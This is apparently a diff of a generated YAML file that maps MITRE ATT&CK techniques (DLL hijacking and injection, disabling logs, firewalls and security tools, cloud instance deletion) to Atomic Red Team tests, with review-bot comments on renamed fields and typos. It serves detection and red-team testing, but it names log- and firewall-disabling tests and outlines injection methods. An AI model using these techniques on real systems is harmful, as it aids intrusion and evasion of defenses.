+ The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
+
+ In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
+
+ In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
+
+ Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot": parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)
+ x_mitre_data_sources:
+ - GCP audit logs
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1574.001:
technique:
+ created: '2020-03-13T18:11:08.357Z'
+ modified: '2020-03-26T16:13:58.862Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
+
+ There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
+
+ Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
+
+ If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
+ Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+ name: DLL Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.001
@@ -21891,30 +22476,6 @@ defense-evasion:
url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html
description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking
Revisited. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: DLL Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
-
- There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
-
- Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
-
- If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
- Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
- id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T16:13:58.862Z'
- created: '2020-03-13T18:11:08.357Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -21991,23 +22552,23 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T16:23:21.010Z'
+ modified: '2020-06-20T22:05:42.513Z'
created: '2020-03-13T19:41:37.908Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Loaded DLLs
- - Process monitoring
- - Process use of network
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor processes for unusual activity (e.g., a process that
does not use the network begins to do so). Track DLL metadata, such as a hash,
and compare DLLs that are loaded at process execution time against previous
executions to detect differences that do not correlate with patching or updates.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - Process monitoring
+ - Process use of network
+ x_mitre_platforms:
+ - Windows
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -22074,6 +22635,20 @@ defense-evasion:
phase_name: initial-access
modified: '2020-03-23T21:37:34.567Z'
created: '2020-03-13T20:15:31.974Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: Monitor whether default accounts have been activated or logged
+ into. These audits should also include checks on any appliances and applications
+ for default credentials or SSH keys, and if any are discovered, they should
+ be updated immediately.
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -22084,20 +22659,60 @@ defense-evasion:
- Office 365
- Azure AD
- SaaS
+ atomic_tests: []
+ T1578.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1578.003
+ url: https://attack.mitre.org/techniques/T1578/003
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
+ - source_name: AWS CloudTrail Search
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ - source_name: Azure Activity Logs
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ - source_name: Cloud Audit Logs
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Delete Cloud Instance
+ description: |-
+ An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
+
+ An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-17T19:53:14.784Z'
+ created: '2020-06-16T17:23:06.508Z'
+ x_mitre_detection: |-
+ The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
+
+ In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)
x_mitre_data_sources:
- - AWS CloudTrail logs
+ - GCP audit logs
- Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_detection: Monitor whether default accounts have been activated or logged
- into. These audits should also include checks on any appliances and applications
- for default credentials or SSH keys, and if any are discovered, they should
- be updated immediately.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
+ - Azure activity logs
+ - AWS CloudTrail logs
x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1140:
technique:
@@ -22133,30 +22748,32 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T21:07:11.799Z'
+ modified: '2020-07-09T14:42:23.122Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
-
- Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ - Red Canary
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
x_mitre_defense_bypassed:
- Anti-virus
- Host intrusion prevention systems
- Signature-based detection
- Network intrusion detection system
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- - Red Canary
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
+
+ Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
identifier: T1140
atomic_tests:
- name: Deobfuscate/Decode Files Or Information
@@ -22231,21 +22848,21 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-01-30T22:27:39.932Z'
created: '2017-05-31T21:30:20.934Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - API monitoring
- x_mitre_defense_bypassed:
- - File monitoring
- - File system access controls
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - File monitoring
+ - File system access controls
+ x_mitre_data_sources:
+ - API monitoring
+ x_mitre_version: '2.0'
atomic_tests: []
T1562.002:
technique:
@@ -22272,20 +22889,20 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:02:33.870Z'
created: '2020-02-21T20:46:36.688Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Log analysis
+ x_mitre_detection: Monitor processes and command-line arguments for commands
+ that can be used to disable logging. Lack of event logs may be suspicious.
x_mitre_data_sources:
- Process monitoring
- Windows event logs
- Process command-line parameters
- x_mitre_detection: Monitor processes and command-line arguments for commands
- that can be used to disable logging. Lack of event logs may be suspicious.
- x_mitre_defense_bypassed:
- - Log analysis
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Windows
identifier: T1562.002
atomic_tests:
- name: Disable Windows IIS HTTP Logging
@@ -22310,6 +22927,57 @@ defense-evasion:
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
}
name: powershell
+ T1562.007:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1562.007
+ url: https://attack.mitre.org/techniques/T1562/007
+ - source_name: Expel IO Evil in AWS
+ url: https://expel.io/blog/finding-evil-in-aws/
+ description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April
+ 28). Finding Evil in AWS. Retrieved June 25, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Disable or Modify Cloud Firewall
+ description: "Adversaries may disable or modify a firewall within a cloud environment
+ to bypass controls that limit access to cloud resources. Cloud firewalls are
+ separate from system firewalls that are described in [Disable or Modify System
+ Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
+ typically utilize restrictive security groups and firewall rules that only
+ allow network activity from trusted IP addresses via expected ports and protocols.
+ An adversary may introduce new firewall rules or policies to allow access
+ into a victim cloud environment. For example, an adversary may use a script
+ or utility that creates new ingress rules in existing security groups to allow
+ any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling
+ a cloud firewall may enable adversary C2 communications, lateral movement,
+ and/or data exfiltration that would otherwise not be allowed."
+ id: attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-07-07T13:49:05.345Z'
+ created: '2020-06-24T16:55:46.243Z'
+ x_mitre_contributors:
+ - Expel
+ x_mitre_detection: Monitor cloud logs for modification or creation of new security
+ groups or firewall rules.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_data_sources:
+ - Stackdriver logs
+ - GCP audit logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
+ atomic_tests: []
T1562.004:
technique:
external_references:
@@ -22334,20 +23002,20 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:18:11.166Z'
created: '2020-02-21T21:00:48.814Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - Firewall
+ x_mitre_detection: Monitor processes and command-line arguments to see if firewalls
+ are disabled or modified. Monitor Registry edits to keys that manage firewalls.
x_mitre_data_sources:
- File monitoring
- Process command-line parameters
- Windows Registry
- x_mitre_detection: Monitor processes and command-line arguments to see if firewalls
- are disabled or modified. Monitor Registry edits to keys that manage firewalls.
- x_mitre_defense_bypassed:
- - Firewall
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1562.004
atomic_tests:
- name: Disable iptables firewall
@@ -22417,6 +23085,22 @@ defense-evasion:
elevation_required: true
T1562.001:
technique:
+ created: '2020-02-21T20:32:20.810Z'
+ modified: '2020-03-29T21:52:43.151Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579
+ description: Adversaries may disable security tools to avoid possible detection
+ of their tools and activities. This can take the form of killing security
+ software or event logging processes, deleting Registry keys so that tools
+ do not start at run time, or other methods to interfere with security tools
+ scanning or reporting information.
+ name: Disable or Modify Tools
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1562.001
@@ -22424,22 +23108,6 @@ defense-evasion:
- external_id: CAPEC-578
source_name: capec
url: https://capec.mitre.org/data/definitions/578.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Disable or Modify Tools
- description: Adversaries may disable security tools to avoid possible detection
- of their tools and activities. This can take the form of killing security
- software or event logging processes, deleting Registry keys so that tools
- do not start at run time, or other methods to interfere with security tools
- scanning or reporting information.
- id: attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T21:52:43.151Z'
- created: '2020-02-21T20:32:20.810Z'
x_mitre_platforms:
- Windows
- macOS
@@ -22932,6 +23600,27 @@ defense-evasion:
elevation_required: true
T1078.002:
technique:
+ created: '2020-03-13T20:21:54.758Z'
+ modified: '2020-03-23T21:08:40.063Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ name: Domain Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
@@ -22948,27 +23637,6 @@ defense-evasion:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-23T21:08:40.063Z'
- created: '2020-03-13T20:21:54.758Z'
x_mitre_platforms:
- Linux
- macOS
@@ -23025,10 +23693,12 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-25T20:51:30.829Z'
created: '2020-02-11T19:05:02.399Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - API monitoring
+ - DLL monitoring
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: "Monitor for calls to OpenProcess that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -23043,12 +23713,10 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
- x_mitre_permissions_required:
- - Administrator
- x_mitre_data_sources:
- - Authentication logs
- - API monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1574.004:
technique:
@@ -23086,12 +23754,13 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T15:32:06.115Z'
+ modified: '2020-06-20T22:06:47.115Z'
created: '2020-03-16T15:23:30.896Z'
- x_mitre_defense_bypassed:
- - Process whitelisting
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to
detect potential cases of dylib hijacking. Monitor file systems for moving,
renaming, replacing, or modifying dylibs. Changes in the set of dylibs that
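Review bot: The `x_mitre_defense_bypassed` value `Process whitelisting` is replaced by `Application control` in this hunk (the old value removed here, the new one added in the following hunk), and the same rename recurs for T1055.001 and T1055.011 further down. Any consumer that filters or groups this generated data on the old string will silently match nothing after this sync, so the change deserves a line in the changelog or release notes rather than passing unmentioned among the key-order churn. The T1574.004 entry this belongs to starts before this hunk and ends after it.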
@@ -23099,14 +23768,37 @@ defense-evasion:
with known software, patches, etc., are suspicious. Check the system for multiple
dylibs with the same name and monitor which versions have historically been
loaded into a process. '
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
atomic_tests: []
T1055.001:
technique:
+ id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
+ in order to evade process-based defenses as well as possibly elevate privileges.
+ DLL injection is a method of executing arbitrary code in the address space
+ of a separate live process. \n\nDLL injection is commonly performed by writing
+ the path to a DLL in the virtual address space of the target process before
+ loading the DLL by invoking a new thread. The write can be performed with
+ native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
+ then invoked with CreateRemoteThread (which calls the LoadLibrary
+ API responsible for loading the DLL). (Citation: Endgame Process Injection
+ July 2017) \n\nVariations of this method such as reflective DLL injection
+ (writing a self-mapping DLL into a process) and memory module (map DLL when
+ writing into process) overcome the address relocation issue as well as the
+ additional APIs to invoke execution (since these methods load and execute
+ the files in memory by manually preforming the function of LoadLibrary).(Citation:
+ Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July
+ 2017) \n\nRunning code in the context of another process may allow access
+ to the process's memory, system/network resources, and possibly elevated privileges.
+ Execution via DLL injection may also evade detection from security products
+ since the execution is masked under a legitimate process. "
+ name: Dynamic-link Library Injection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1055.001
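Review bot: The moved T1055.001 description still reads `manually preforming the function of LoadLibrary` where `performing` is meant, and the new T1480.001 description in a later hunk has `constraint execution to a specific target environment` for `constrain execution`. Both strings appear to be carried over verbatim from the upstream ATT&CK descriptions, and the key-order churn across this diff suggests the file is regenerated, so a hand edit here would presumably be overwritten on the next sync; the correction belongs in the upstream data or the generator. The T1055.001 entry continues into the next hunk.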
@@ -23120,37 +23812,13 @@ defense-evasion:
description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
7, 2017.
source_name: Endgame HuntingNMemory June 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dynamic-link Library Injection
- description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
- in order to evade process-based defenses as well as possibly elevate privileges.
- DLL injection is a method of executing arbitrary code in the address space
- of a separate live process. \n\nDLL injection is commonly performed by writing
- the path to a DLL in the virtual address space of the target process before
- loading the DLL by invoking a new thread. The write can be performed with
- native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
- then invoked with CreateRemoteThread (which calls the LoadLibrary
- API responsible for loading the DLL). (Citation: Endgame Process Injection
- July 2017) \n\nVariations of this method such as reflective DLL injection
- (writing a self-mapping DLL into a process) and memory module (map DLL when
- writing into process) overcome the address relocation issue as well as the
- additional APIs to invoke execution (since these methods load and execute
- the files in memory by manually preforming the function of LoadLibrary
- ).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process
- Injection July 2017) \n\nRunning code in the context of another process may
- allow access to the process's memory, system/network resources, and possibly
- elevated privileges. Execution via DLL injection may also evade detection
- from security products since the execution is masked under a legitimate process. "
- id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-02-21T22:32:05.210Z'
+ modified: '2020-06-20T22:17:59.148Z'
created: '2020-01-14T01:26:08.145Z'
x_mitre_platforms:
- Windows
@@ -23178,7 +23846,7 @@ defense-evasion:
- File monitoring
- API monitoring
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
- Anti-virus
atomic_tests: []
T1548.004:
@@ -23237,27 +23905,103 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-27T12:04:37.823Z'
created: '2020-01-30T14:40:20.187Z'
- x_mitre_platforms:
- - macOS
- x_mitre_contributors:
- - Jimmy Astle, @AstleJimmy, Carbon Black
- - Erika Noerenberg, @gutterchurl, Carbon Black
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - root
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: Consider monitoring for /usr/libexec/security_authtrampoline
executions which may indicate that AuthorizationExecuteWithPrivileges
is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges
is being called. Monitoring OS API callbacks for the execution can also be
a way to detect this behavior but requires specialized security tooling.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_effective_permissions:
- - root
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
+ x_mitre_contributors:
+ - Jimmy Astle, @AstleJimmy, Carbon Black
+ - Erika Noerenberg, @gutterchurl, Carbon Black
+ x_mitre_platforms:
+ - macOS
+ atomic_tests: []
+ T1480.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1480.001
+ url: https://attack.mitre.org/techniques/T1480/001
+ - source_name: EK Clueless Agents
+ url: https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf
+ description: Riordan, J., Schneier, B. (1998, June 18). Environmental Key
+ Generation towards Clueless Agents. Retrieved January 18, 2019.
+ - source_name: Kaspersky Gauss Whitepaper
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf
+ description: 'Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution.
+ Retrieved January 17, 2019.'
